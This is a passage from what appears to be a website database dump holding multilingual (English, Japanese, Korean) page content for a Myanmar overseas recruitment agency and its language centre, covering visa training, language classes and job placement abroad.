src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e.jpg\" data-entity-uuid=\"6fde88f6-3208-43c8-b938-4945a6f778ae\" data-entity-type=\"file\" alt=\"\"><br>&nbsp;</p><blockquote><p>From the HIT Language Center</p></blockquote><p><br>• Korean Language Class that will teach business expressions needed in the KOSHIPA SKILL TEST INTERVIEW to give you an advantage in communication even if you have the same skills.<br>• Japanese Language Class for those who want to master the Japanese language from the basics<br>• For those who want to go to Japan with Tokutei Visa, Work-only (Training Visa), Elderly care (Kaigo), Beginner / IT computer degree, we are constantly connecting with training schools and providing training classes to make them full of talent.<br>• For those who want to take Japanese language courses in the other surrounded cities, we are connecting with other joint language schools in Bago, Mawlamyine, and Sagaing.&nbsp;</p>', '', 'full_html'),
('page', 0, 24, 411, 'ja', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217_0.png\" data-entity-uuid=\"d0f4e5f0-d3b4-4a71-a4f7-e4dfd02c6e4f\" data-entity-type=\"file\" width=\"100%\"><p>1. &nbsp;ニューコメットトレンディング海外エージェンシーでは韓国の造船所でE 7-3 Visaで働きたいミャンマー全国か &nbsp;ら民族問わず、シンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしてお り ます。<br>2. 海外に勤める際使えるそれぞれの国の言語が勉強できる学校も開いております。(現在日本語学校、韓国語学校, タイ語学校, 英語学校)<br>3 .パスポート作成サービス<br>4. 日本に実習生、特定技能などで勤める学生達には言語だけでなく日本の習慣、文化なども授業の一部として、 &nbsp;取り込んでおります。<br>5. 日本語能力試験(JLPT, &nbsp;JFT, &nbsp;NAT-TEST, TOP-J)のN3,N2以上の合格者達にはワークビザである<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;通訳、翻訳<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;IT事業<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;エンジニアに関する事業 &nbsp;(Civil,Mechanical,EP,EC,Auto Cardなど)<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係</p><p>&nbsp;実習生ビザなどに興味を持たれた学生達には下記　の仕事の紹介を行っております。</p><p>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;車修理関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;工業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;建築業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;食品関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;レストラン<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;ホテル関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;衣類関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;農業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;漁業関係の工場<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係 {Training Visa)</p><p>6.ドバイ、マレーシア、シンガポール、タイ、日本、韓国などで働きたい学生達のためにも英語など必要な場合に応じて、パソコントレーニングでできない事がないように時間をかけて、良いネットワークで仕事のチャンスを掴むサビースをしております。</p><p>7.上記のサービスをInternational Recruitment Integrity System(IRIS)が定めたEthical Recruitment and Fair Labour &nbsp;Practicesに合った基準で管理しております。<br>&nbsp;</p><p>ニューコメットトレンディング海外エージェンシーは、職場での言語要件を提供するためにHIT Language Centerを開設しました。</p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_0.jpg\" data-entity-uuid=\"e886989a-4bfa-4f58-807c-d350f4453113\" data-entity-type=\"file\"><blockquote><p>HIT Language Centerからのお知らせ：</p></blockquote><p><br>・KOSHIPA SKILL TEST INTERVIEWで必要とされるビジネス表現を教える韓国語クラス。同じスキルを持っていてもコミュニケーションで優位に立つための授業です。<br>・基礎から日本語をマスターしたい方のための日本語クラス。<br>・特定ビザで日本に行きたい方々には、働き専用（トレーニングビザ）、介護（介護ビザ）、初心者/ITコンピューター学校卒業生などに関連するトレーニング校とのつながりを継続的に提供し、トレーニングクラスを提供しています。<br>・他の周辺都市で日本語の授業を受けたい方々には、バゴ、モーラミャイン、サガインといった他の共同語学学校との連携も行っております。</p><img data-entity-uuid=\"d4276177-aa5b-4ee5-a82f-aad6b6aacba3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-19_5.jpg\">', '', 'full_html'),
('page', 0, 24, 411, 'ko', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217_1.png\" data-align=\"center\" data-entity-uuid=\"e5deb7cf-45ee-4a4a-8dc7-90ebd6e964af\" data-entity-type=\"file\" width=\"100%\"><p>1.&nbsp;&nbsp;&nbsp;&nbsp;한국 조선소에서 E-7-3 비자(용접공)로 일하고 싶은 미얀마 여러 지역에서 온 모든 노동자들을 인종과 종교의 차별 없이 교통통신부 산하 씬마락 (Sinmalike) 조선소에서 필요한 교육을 시키고 취업 기회를 제공함해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>2.&nbsp;&nbsp;&nbsp;&nbsp;외국에서 일할 때 직장에서 어려움을 겪지 않도록, 직장에 사용하는 기본 한국어, 일본어, 태국어, 영어 등 교육시킴<br>3.&nbsp;&nbsp;&nbsp;&nbsp;해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>4.&nbsp;&nbsp;&nbsp;&nbsp;일본으로 연수비자 도쿠테이 기노( Tokutei Ginou) 비자로 취업을 희망하는 분들 위해 일본의 전통문화와 풍속을 익히도록 필요한 코스를 개설, 교육 시키고 취직을 연결<br>5.&nbsp;&nbsp;&nbsp;&nbsp;일본어 시험 N3, N2(JLPT, JFT, NAT-Test, Top J) 이상에 합격하는 분들이Work Visa 인<br>• 번역 직업<br>• IT 직업<br>• 엔지니어링 관련 직업(Civil, Mechanical, EP, EC, Auto CAD 등)<br>• 간호지원 직업으로 일본으로 가고 싶다면 해당 학당으로 연결<br>New Comet Trading Agency는 다음 사업체를 훈련 비자 (Training Visa)로 가고 싶은 젊은 형제 자매를 위해 서비스를 주선하고 있습니다.<br>• 자동차 수리 및 관련 직업<br>• 산업 직업<br>• 집 짓기 직업<br>• 식품 산업<br>• 쌀 상자 공장<br>• 매장 운영<br>• 호텔 비즈니스<br>• 의류 산업<br>• 건설 직업<br>• 농업 직업<br>• 물 제품, 어업 관련 공장<br>• 노인 돌봄 서비스 사업<br>6.&nbsp;&nbsp;&nbsp;두바이, 말레이시아, 싱가포르, 태국, 일본, 한국 등과 같은 국가에서 일하기를 원하는 사람들을 위해 기본 영어 과정과 필요하는 경우에 컴퓨터 교육과 같은 많은 과정들과 연결하고 취업 기회를 제공하는 서비스를 하고 있습니다.<br>7.&nbsp;&nbsp;&nbsp;&nbsp;상기 서비스들을 &nbsp;IRIS(International Recruitment Integrity System)에서 제정한 윤리적 채용 및 공정한 노동 관행의 기준에 따라 마련하고 제공합니다.</p><p>&nbsp;</p><p>New Comet Agency는 HIT Language Center를 개설하여 직장에서 필요한 언어교육을 제공합니다.</p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_1.jpg\" data-entity-uuid=\"9da0938d-889d-4fb8-a66d-21c938aa7bee\" data-entity-type=\"file\"><blockquote><p><br>HIT 교육 센터에서는</p></blockquote><p><br>• KOSHIPA 기량검증 면접 시 도움되는 한국어 표현을 효율적으로 가르칩니다.<br>• 일본어를 기초부터 마스터하고 싶은 분을 위한 일본어 수업을 제공합니다.<br>• Tokutei Visa, Work-only (Training Visa), Elderly Care (Kaigo), Beginner / IT computer degree로 일본에 가고자 하는 분들을 위한 교육센터와 연계하여 필요한 기술을 습득하도록 합다.<br>• 일본어 코스를 수강하려는 타지역 사람들을 위해 Bago, Mawlamyine 및 Sagaing의 교육 기관과 연계하고 있습니다.</p>', '', 'full_html'),
('page', 0, 24, 412, 'en', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217.png\" data-align=\"center\" data-entity-uuid=\"242d95bb-8dd8-4539-b5f8-9308dfcbde3f\" data-entity-type=\"file\" width=\"100%\"><p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>2. Co-opening and teaching Korean, Japanese, Thailand and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, Japan, Korea and etc., we provide services to facilitate employment opportunities, if necessary, we connect with many courses such as computer training and basic English courses.</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p><p>&nbsp;</p><p>New Comet Agency has opened HIT Language Center to provide language requirement in the workplace.&nbsp;</p><p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e.jpg\" data-entity-uuid=\"6fde88f6-3208-43c8-b938-4945a6f778ae\" data-entity-type=\"file\" alt=\"\"><br>&nbsp;</p><blockquote><p>From the HIT Language Center</p></blockquote><p><br>• Korean Language Class that will teach business expressions needed in the KOSHIPA SKILL TEST INTERVIEW to give you an advantage in communication even if you have the same skills.<br>• Japanese Language Class for those who want to master the Japanese language from the basics<br>• For those who want to go to Japan with Tokutei Visa, Work-only (Training Visa), Elderly care (Kaigo), Beginner / IT computer degree, we are constantly connecting with training schools and providing training classes to make them full of talent.<br>• For those who want to take Japanese language courses in the other surrounded cities, we are connecting with other joint language schools in Bago, Mawlamyine, and Sagaing.&nbsp;</p><img data-entity-uuid=\"a6dfcb06-87d0-4a8b-9799-cc92e249f5fa\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-19_6.jpg\" data-align=\"center\">', '', 'full_html'),
('page', 0, 24, 412, 'ja', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217_0.png\" data-entity-uuid=\"d0f4e5f0-d3b4-4a71-a4f7-e4dfd02c6e4f\" data-entity-type=\"file\" width=\"100%\"><p>1. &nbsp;ニューコメットトレンディング海外エージェンシーでは韓国の造船所でE 7-3 Visaで働きたいミャンマー全国か &nbsp;ら民族問わず、シンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしてお り ます。<br>2. 海外に勤める際使えるそれぞれの国の言語が勉強できる学校も開いております。(現在日本語学校、韓国語学校, タイ語学校, 英語学校)<br>3 .パスポート作成サービス<br>4. 日本に実習生、特定技能などで勤める学生達には言語だけでなく日本の習慣、文化なども授業の一部として、 &nbsp;取り込んでおります。<br>5. 日本語能力試験(JLPT, &nbsp;JFT, &nbsp;NAT-TEST, TOP-J)のN3,N2以上の合格者達にはワークビザである<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;通訳、翻訳<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;IT事業<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;エンジニアに関する事業 &nbsp;(Civil,Mechanical,EP,EC,Auto Cardなど)<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係</p><p>&nbsp;実習生ビザなどに興味を持たれた学生達には下記　の仕事の紹介を行っております。</p><p>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;車修理関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;工業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;建築業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;食品関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;レストラン<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;ホテル関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;衣類関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;農業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;漁業関係の工場<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係 {Training Visa)</p><p>6.ドバイ、マレーシア、シンガポール、タイ、日本、韓国などで働きたい学生達のためにも英語など必要な場合に応じて、パソコントレーニングでできない事がないように時間をかけて、良いネットワークで仕事のチャンスを掴むサビースをしております。</p><p>7.上記のサービスをInternational Recruitment Integrity System(IRIS)が定めたEthical Recruitment and Fair Labour &nbsp;Practicesに合った基準で管理しております。<br>&nbsp;</p><p>ニューコメットトレンディング海外エージェンシーは、職場での言語要件を提供するためにHIT Language Centerを開設しました。</p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_0.jpg\" data-entity-uuid=\"e886989a-4bfa-4f58-807c-d350f4453113\" data-entity-type=\"file\"><blockquote><p>HIT Language Centerからのお知らせ：</p></blockquote><p><br>・KOSHIPA SKILL TEST INTERVIEWで必要とされるビジネス表現を教える韓国語クラス。同じスキルを持っていてもコミュニケーションで優位に立つための授業です。<br>・基礎から日本語をマスターしたい方のための日本語クラス。<br>・特定ビザで日本に行きたい方々には、働き専用（トレーニングビザ）、介護（介護ビザ）、初心者/ITコンピューター学校卒業生などに関連するトレーニング校とのつながりを継続的に提供し、トレーニングクラスを提供しています。<br>・他の周辺都市で日本語の授業を受けたい方々には、バゴ、モーラミャイン、サガインといった他の共同語学学校との連携も行っております。</p><img data-entity-uuid=\"d4276177-aa5b-4ee5-a82f-aad6b6aacba3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-19_5.jpg\">', '', 'full_html'),
('page', 0, 24, 412, 'ko', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217_1.png\" data-align=\"center\" data-entity-uuid=\"e5deb7cf-45ee-4a4a-8dc7-90ebd6e964af\" data-entity-type=\"file\" width=\"100%\"><p>1.&nbsp;&nbsp;&nbsp;&nbsp;한국 조선소에서 E-7-3 비자(용접공)로 일하고 싶은 미얀마 여러 지역에서 온 모든 노동자들을 인종과 종교의 차별 없이 교통통신부 산하 씬마락 (Sinmalike) 조선소에서 필요한 교육을 시키고 취업 기회를 제공함해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>2.&nbsp;&nbsp;&nbsp;&nbsp;외국에서 일할 때 직장에서 어려움을 겪지 않도록, 직장에 사용하는 기본 한국어, 일본어, 태국어, 영어 등 교육시킴<br>3.&nbsp;&nbsp;&nbsp;&nbsp;해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>4.&nbsp;&nbsp;&nbsp;&nbsp;일본으로 연수비자 도쿠테이 기노( Tokutei Ginou) 비자로 취업을 희망하는 분들 위해 일본의 전통문화와 풍속을 익히도록 필요한 코스를 개설, 교육 시키고 취직을 연결<br>5.&nbsp;&nbsp;&nbsp;&nbsp;일본어 시험 N3, N2(JLPT, JFT, NAT-Test, Top J) 이상에 합격하는 분들이Work Visa 인<br>• 번역 직업<br>• IT 직업<br>• 엔지니어링 관련 직업(Civil, Mechanical, EP, EC, Auto CAD 등)<br>• 간호지원 직업으로 일본으로 가고 싶다면 해당 학당으로 연결<br>New Comet Trading Agency는 다음 사업체를 훈련 비자 (Training Visa)로 가고 싶은 젊은 형제 자매를 위해 서비스를 주선하고 있습니다.<br>• 자동차 수리 및 관련 직업<br>• 산업 직업<br>• 집 짓기 직업<br>• 식품 산업<br>• 쌀 상자 공장<br>• 매장 운영<br>• 호텔 비즈니스<br>• 의류 산업<br>• 건설 직업<br>• 농업 직업<br>• 물 제품, 어업 관련 공장<br>• 노인 돌봄 서비스 사업<br>6.&nbsp;&nbsp;&nbsp;두바이, 말레이시아, 싱가포르, 태국, 일본, 한국 등과 같은 국가에서 일하기를 원하는 사람들을 위해 기본 영어 과정과 필요하는 경우에 컴퓨터 교육과 같은 많은 과정들과 연결하고 취업 기회를 제공하는 서비스를 하고 있습니다.<br>7.&nbsp;&nbsp;&nbsp;&nbsp;상기 서비스들을 &nbsp;IRIS(International Recruitment Integrity System)에서 제정한 윤리적 채용 및 공정한 노동 관행의 기준에 따라 마련하고 제공합니다.</p><p>&nbsp;</p><p>New Comet Agency는 HIT Language Center를 개설하여 직장에서 필요한 언어교육을 제공합니다.</p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_1.jpg\" data-entity-uuid=\"9da0938d-889d-4fb8-a66d-21c938aa7bee\" data-entity-type=\"file\"><blockquote><p><br>HIT 교육 센터에서는</p></blockquote><p><br>• KOSHIPA 기량검증 면접 시 도움되는 한국어 표현을 효율적으로 가르칩니다.<br>• 일본어를 기초부터 마스터하고 싶은 분을 위한 일본어 수업을 제공합니다.<br>• Tokutei Visa, Work-only (Training Visa), Elderly Care (Kaigo), Beginner / IT computer degree로 일본에 가고자 하는 분들을 위한 교육센터와 연계하여 필요한 기술을 습득하도록 합다.<br>• 일본어 코스를 수강하려는 타지역 사람들을 위해 Bago, Mawlamyine 및 Sagaing의 교육 기관과 연계하고 있습니다.</p>', '', 'full_html'),
('page', 0, 24, 413, 'en', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217.png\" data-align=\"center\" data-entity-uuid=\"242d95bb-8dd8-4539-b5f8-9308dfcbde3f\" data-entity-type=\"file\" width=\"100%\"><p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>2. Co-opening and teaching Korean, Japanese, Thailand and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, Japan, Korea and etc., we provide services to facilitate employment opportunities, if necessary, we connect with many courses such as computer training and basic English courses.</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p><p>&nbsp;</p><p>New Comet Agency has opened HIT Language Center to provide language requirement in the workplace.&nbsp;</p><p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e.jpg\" data-entity-uuid=\"6fde88f6-3208-43c8-b938-4945a6f778ae\" data-entity-type=\"file\" alt=\"\"><br>&nbsp;</p><blockquote><p>From the HIT Language Center</p></blockquote><p><br>• Korean Language Class that will teach business expressions needed in the KOSHIPA SKILL TEST INTERVIEW to give you an advantage in communication even if you have the same skills.<br>• Japanese Language Class for those who want to master the Japanese language from the basics<br>• For those who want to go to Japan with Tokutei Visa, Work-only (Training Visa), Elderly care (Kaigo), Beginner / IT computer degree, we are constantly connecting with training schools and providing training classes to make them full of talent.<br>• For those who want to take Japanese language courses in the other surrounded cities, we are connecting with other joint language schools in Bago, Mawlamyine, and Sagaing.&nbsp;</p><img data-entity-uuid=\"a6dfcb06-87d0-4a8b-9799-cc92e249f5fa\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-19_6.jpg\" data-align=\"center\">', '', 'full_html'),
('page', 0, 24, 413, 'ja', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217_0.png\" data-entity-uuid=\"d0f4e5f0-d3b4-4a71-a4f7-e4dfd02c6e4f\" data-entity-type=\"file\" width=\"100%\"><p>1. &nbsp;ニューコメットトレンディング海外エージェンシーでは韓国の造船所でE 7-3 Visaで働きたいミャンマー全国か &nbsp;ら民族問わず、シンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしてお り ます。<br>2. 海外に勤める際使えるそれぞれの国の言語が勉強できる学校も開いております。(現在日本語学校、韓国語学校, タイ語学校, 英語学校)<br>3 .パスポート作成サービス<br>4. 日本に実習生、特定技能などで勤める学生達には言語だけでなく日本の習慣、文化なども授業の一部として、 &nbsp;取り込んでおります。<br>5. 日本語能力試験(JLPT, &nbsp;JFT, &nbsp;NAT-TEST, TOP-J)のN3,N2以上の合格者達にはワークビザである<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;通訳、翻訳<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;IT事業<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;エンジニアに関する事業 &nbsp;(Civil,Mechanical,EP,EC,Auto Cardなど)<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係</p><p>&nbsp;実習生ビザなどに興味を持たれた学生達には下記　の仕事の紹介を行っております。</p><p>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;車修理関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;工業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;建築業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;食品関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;レストラン<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;ホテル関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;衣類関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;農業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;漁業関係の工場<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係 {Training Visa)</p><p>6.ドバイ、マレーシア、シンガポール、タイ、日本、韓国などで働きたい学生達のためにも英語など必要な場合に応じて、パソコントレーニングでできない事がないように時間をかけて、良いネットワークで仕事のチャンスを掴むサビースをしております。</p><p>7.上記のサービスをInternational Recruitment Integrity System(IRIS)が定めたEthical Recruitment and Fair Labour &nbsp;Practicesに合った基準で管理しております。<br>&nbsp;</p><p>ニューコメットトレンディング海外エージェンシーは、職場での言語要件を提供するためにHIT Language Centerを開設しました。</p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_0.jpg\" data-entity-uuid=\"e886989a-4bfa-4f58-807c-d350f4453113\" data-entity-type=\"file\"><blockquote><p>HIT Language Centerからのお知らせ：</p></blockquote><p><br>・KOSHIPA SKILL TEST INTERVIEWで必要とされるビジネス表現を教える韓国語クラス。同じスキルを持っていてもコミュニケーションで優位に立つための授業です。<br>・基礎から日本語をマスターしたい方のための日本語クラス。<br>・特定ビザで日本に行きたい方々には、働き専用（トレーニングビザ）、介護（介護ビザ）、初心者/ITコンピューター学校卒業生などに関連するトレーニング校とのつながりを継続的に提供し、トレーニングクラスを提供しています。<br>・他の周辺都市で日本語の授業を受けたい方々には、バゴ、モーラミャイン、サガインといった他の共同語学学校との連携も行っております。</p><img data-entity-uuid=\"d4276177-aa5b-4ee5-a82f-aad6b6aacba3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-19_5.jpg\">', '', 'full_html'),
('page', 0, 24, 413, 'ko', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217_1.png\" data-align=\"center\" data-entity-uuid=\"e5deb7cf-45ee-4a4a-8dc7-90ebd6e964af\" data-entity-type=\"file\" width=\"100%\"><p>1.&nbsp;&nbsp;&nbsp;&nbsp;한국 조선소에서 E-7-3 비자(용접공)로 일하고 싶은 미얀마 여러 지역에서 온 모든 노동자들을 인종과 종교의 차별 없이 교통통신부 산하 씬마락 (Sinmalike) 조선소에서 필요한 교육을 시키고 취업 기회를 제공함해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>2.&nbsp;&nbsp;&nbsp;&nbsp;외국에서 일할 때 직장에서 어려움을 겪지 않도록, 직장에 사용하는 기본 한국어, 일본어, 태국어, 영어 등 교육시킴<br>3.&nbsp;&nbsp;&nbsp;&nbsp;해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>4.&nbsp;&nbsp;&nbsp;&nbsp;일본으로 연수비자 도쿠테이 기노( Tokutei Ginou) 비자로 취업을 희망하는 분들 위해 일본의 전통문화와 풍속을 익히도록 필요한 코스를 개설, 교육 시키고 취직을 연결<br>5.&nbsp;&nbsp;&nbsp;&nbsp;일본어 시험 N3, N2(JLPT, JFT, NAT-Test, Top J) 이상에 합격하는 분들이Work Visa 인<br>• 번역 직업<br>• IT 직업<br>• 엔지니어링 관련 직업(Civil, Mechanical, EP, EC, Auto CAD 등)<br>• 간호지원 직업으로 일본으로 가고 싶다면 해당 학당으로 연결<br>New Comet Trading Agency는 다음 사업체를 훈련 비자 (Training Visa)로 가고 싶은 젊은 형제 자매를 위해 서비스를 주선하고 있습니다.<br>• 자동차 수리 및 관련 직업<br>• 산업 직업<br>• 집 짓기 직업<br>• 식품 산업<br>• 쌀 상자 공장<br>• 매장 운영<br>• 호텔 비즈니스<br>• 의류 산업<br>• 건설 직업<br>• 농업 직업<br>• 물 제품, 어업 관련 공장<br>• 노인 돌봄 서비스 사업<br>6.&nbsp;&nbsp;&nbsp;두바이, 말레이시아, 싱가포르, 태국, 일본, 한국 등과 같은 국가에서 일하기를 원하는 사람들을 위해 기본 영어 과정과 필요하는 경우에 컴퓨터 교육과 같은 많은 과정들과 연결하고 취업 기회를 제공하는 서비스를 하고 있습니다.<br>7.&nbsp;&nbsp;&nbsp;&nbsp;상기 서비스들을 &nbsp;IRIS(International Recruitment Integrity System)에서 제정한 윤리적 채용 및 공정한 노동 관행의 기준에 따라 마련하고 제공합니다.</p><p>&nbsp;</p><p>New Comet Agency는 HIT Language Center를 개설하여 직장에서 필요한 언어교육을 제공합니다.</p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_1.jpg\" data-entity-uuid=\"9da0938d-889d-4fb8-a66d-21c938aa7bee\" data-entity-type=\"file\"><blockquote><p><br>HIT 교육 센터에서는</p></blockquote><p><br>• KOSHIPA 기량검증 면접 시 도움되는 한국어 표현을 효율적으로 가르칩니다.<br>• 일본어를 기초부터 마스터하고 싶은 분을 위한 일본어 수업을 제공합니다.<br>• Tokutei Visa, Work-only (Training Visa), Elderly Care (Kaigo), Beginner / IT computer degree로 일본에 가고자 하는 분들을 위한 교육센터와 연계하여 필요한 기술을 습득하도록 합다.<br>• 일본어 코스를 수강하려는 타지역 사람들을 위해 Bago, Mawlamyine 및 Sagaing의 교육 기관과 연계하고 있습니다.</p><img data-entity-uuid=\"a3f87ad4-737d-4248-8c12-cedecd90d53a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-19_7.jpg\" data-align=\"center\">', '', 'full_html'),
('page', 0, 25, 99, 'en', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 25, 100, 'en', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 25, 100, 'ja', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 25, 101, 'en', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 25, 101, 'ja', 0, '<p>Coming soon...</p>', '', 'full_html'),
